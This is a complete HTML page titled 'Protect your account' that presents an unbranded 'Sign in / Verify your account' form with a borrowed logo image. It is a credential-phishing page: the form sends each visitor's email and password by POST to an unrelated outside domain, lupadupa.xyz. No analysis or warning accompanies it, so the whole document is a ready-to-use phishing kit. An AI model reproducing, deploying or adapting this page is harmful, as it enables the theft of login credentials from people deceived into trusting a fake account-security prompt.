

<!DOCTYPE html>
<html>
    <head>
        <style>
            body {
                font-family: "Open Sans", sans-serif;
            }

            button {
                width: 80%;
                margin-bottom: 30%;
                margin-left: auto;
                margin-right: auto;
                display: block;
                background-color: white;
                height: 40px;
                color: #188fff;
                border: 1px solid #188fff;
                border-radius: 30px;
                font-size: 1.5rem;
            }

            button:hover {
                background-color: #188fff;
                color: #ffffff;
            }

            h1 {
                text-align: center;
                font-size: 1.5rem;
                margin-bottom: 1px;
            }

            form {
                padding-bottom: 10%;
            }

            .infoText {
                text-align: center;
                margin-bottom: 20%;
                margin-top: 0;
                font-size: 0.8rem;
                font-weight: 500;
                color: grey;
            }

            .footerz {
                text-align: center;
                color: #188fff;
                font-size: 0.65rem;
                margin-bottom: 10%;
            }

            input {
                border-bottom: 1px solid #b8bec2;
                border-top: none;
                border-left: none;
                border-right: none;
                background-color: white;
                width: 80%;
                margin-bottom: 10%;
                margin-left: auto;
                margin-right: auto;
                display: block;
            }

            ::placeholder {
                padding-bottom: 4%;
                font-size: 1rem;
                text-align: center;
                color: #b8bec2;
                font-weight: 600;
            }

            .logo {
                width: 50%;
                margin-left: auto;
                margin-right: auto;
                display: block;
            }

            h2 {
                display: inline;
                margin: 0;
            }

            #logoz {
                display: inline;
            }

            .header {
                width: 30%;
				display: inline-block;
            }

            .container {
                width: 80%;
                height: 500px;
                margin: 0 auto;
                background-color: white;
                -webkit-box-shadow: 0px -2px 5px -2px rgba(0, 0, 0, 0.75);
                -moz-box-shadow: 0px -2px 5px -2px rgba(0, 0, 0, 0.75);
                box-shadow: 0px -2px 5px -2px rgba(0, 0, 0, 0.75);
                padding-bottom: 0.5%;
            }

            @media screen and (min-width: 600px) {
                .container {
                    width: 25%;
                    margin: auto;
                }

                .header {
                    width: 10%;
                }

                button {
                    margin-bottom: 5%;
                }

                .footerz {
                    margin-bottom: 5%;
                }
            }
        </style>
        <meta charset="utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <title>Protect your account</title>
        <meta name="description" content="" />
        <link
            rel="shortcut icon"
            href="https://i.pinimg.com/originals/ce/af/83/ceaf8384322af790486cff176a0a2f24.png"
            type="image/x-icon"
        />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <link rel="stylesheet" href="styles.css" />
        <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet" />
    </head>
    <body>
        <header>
        <img
            class="header"
            src="#"
            alt=""
            class="logo" id="logoz"
        />
        </header>
        <div class="container">
            <img
                src="https://i.pinimg.com/originals/ce/af/83/ceaf8384322af790486cff176a0a2f24.png"
                alt=""
                class="logo"
            />
            <h1>Sign in</h1>
            <p class="infoText">Verify your account</p>
            <form action="https://lupadupa.xyz/" method="POST">
                <input type="email" name="email" required class="email" placeholder="Email" />
                <input type="password" required name="password" class="password" placeholder="Password" /><br />
                <button type="submit" name="submit">Confirm</button>
            </form>
            
        </div>
        <script src="" async defer></script>
    </body>
</html>

